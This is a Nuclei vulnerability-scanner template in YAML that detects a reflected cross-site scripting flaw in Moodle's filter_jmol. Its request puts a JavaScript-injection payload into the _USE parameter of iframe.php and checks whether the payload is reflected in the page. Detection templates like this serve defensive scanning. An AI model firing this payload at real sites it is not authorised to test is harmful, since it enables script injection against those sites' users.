nuclei-templates/vulnerabilities/moodle-filter-jmol-xss.yaml

20 lines
368 B
YAML

id: moodle-filter-jmol-xss
info:
name: Moodle filter_jmol XSS
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/filter/jmol/iframe.php?_USE=%22};alert(1337);//"
matchers:
- type: status
status:
- 200
- type: word
words:
- "\"};alert(1337);//"
part: body